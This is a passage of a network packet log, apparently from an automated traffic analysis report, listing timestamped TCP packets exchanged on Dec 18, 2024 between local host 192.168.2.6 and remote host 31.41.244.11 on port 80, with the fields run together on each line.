                                                                                                                                                              Dec 18, 2024 11:47:47.193777084 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.193809032 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.193845987 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.194925070 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.194967031 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.195034981 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.195075035 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.196085930 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.196127892 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.196233988 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.196275949 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.197870970 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.197916985 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.197943926 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.197979927 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.198508978 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.198553085 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.198585033 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.198622942 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.329010010 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.329081059 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.329106092 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.329140902 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.329336882 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.329380989 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.329413891 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.329452038 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.330450058 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.330497026 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.330564976 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.330617905 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.331732035 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.331773043 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.331803083 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.331844091 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.332508087 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.332551003 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.332555056 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.332592964 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.333725929 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.333767891 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.333904028 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.333942890 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.334985018 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.335027933 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.335088968 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.335127115 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.335966110 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.336008072 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.336090088 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.336128950 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.337215900 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.337233067 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.337260962 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.337275982 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.338439941 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.338484049 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.338551998 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.338591099 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.339482069 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.339524031 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.339652061 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.339692116 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.340676069 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.340715885 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.340790987 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.340831041 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.341909885 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.341954947 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.342053890 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.342097998 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.343178988 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.343233109 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.343254089 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.343291044 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.344398975 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.344451904 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.344512939 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.344666958 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.345532894 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.345577955 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.345597029 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.345634937 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.346709967 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.346756935 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.346791983 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.346832037 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.347682953 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.347727060 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.347786903 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.347826004 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.348918915 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.348968029 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.348972082 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.349019051 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.350006104 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.350053072 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.350146055 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.350188017 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.351202011 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.351252079 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.351308107 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.351351023 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.352406979 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.352457047 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.352547884 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.352588892 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.353581905 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.353629112 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.353703022 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.353743076 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.354706049 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.354752064 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.354801893 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.354840994 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.355875015 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.355916023 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.356007099 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.356620073 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.357084036 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.357189894 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.357208014 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.357229948 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.358340025 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.358351946 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.358385086 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.359363079 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.359407902 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.359466076 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.359505892 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.360619068 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.360631943 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.360662937 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.361746073 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.361787081 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.361867905 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.361907959 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.362859011 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.362905979 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.362967014 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.363003016 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.364051104 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.364063978 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.364094019 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.364109039 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.365200996 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.365245104 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.365318060 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.365359068 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.366470098 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.366518021 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.366565943 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.366605043 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.367558956 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.367602110 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.367749929 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.367788076 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.368760109 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.368803024 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.368822098 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.368860006 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.369954109 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.369992971 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.370038986 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.370078087 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.371145010 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.371185064 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.371299982 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.371337891 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.372374058 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.372412920 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.372448921 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.372488022 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.373709917 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.373750925 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.373806000 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.373843908 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.374577045 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.374624014 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.374644041 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.374680042 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.375730038 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.375771046 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.375852108 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.375889063 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.376951933 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.376991987 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.377078056 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.377115965 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.378087997 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.378124952 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.378221035 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.378257990 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.379262924 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.379302979 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.379373074 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.379410982 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.380408049 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.380450010 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.380523920 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.380563021 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.381753922 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.381794930 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.381890059 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.381941080 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.382761955 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.382802010 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.382819891 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.382855892 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.383953094 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.383996964 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.384147882 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.384187937 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.385325909 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.385338068 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.385364056 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.385381937 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.386288881 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.386339903 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.386377096 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.386418104 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.387430906 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.387473106 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.387578011 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.387617111 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.388622046 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.388665915 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.388709068 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.388794899 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.389853954 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.389899015 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.389976025 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.390016079 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.520513058 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.520610094 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.520611048 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.520740032 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.521152020 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.521178007 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.521208048 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.521239996 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.522346020 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.522403002 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.522404909 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.522438049 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.523427963 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.523482084 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.523807049 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.523853064 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.523888111 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.523927927 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.525029898 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.525084972 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.525109053 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.525144100 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.526154041 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.526209116 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.526262045 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.526298046 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.527323008 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.527369022 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.527415991 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.527452946 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.528487921 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.528542042 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.528551102 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.528584003 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.529647112 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.529701948 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.529753923 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.529793978 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.530843973 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.530888081 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.530915022 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.530949116 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.532031059 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.532075882 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.532124043 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.532161951 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.533154011 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.533205032 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.533272028 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.533315897 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.534342051 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.534389973 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.534420967 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.534456968 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.535598040 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.535610914 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.535640955 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.535674095 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.536745071 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.536783934 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.536802053 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.536835909 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.537830114 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.537904978 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.538062096 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.539011955 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.539056063 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.539127111 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.539194107 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.540365934 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.540422916 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.540427923 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.540472031 CET4987880192.168.2.631.41.244.11
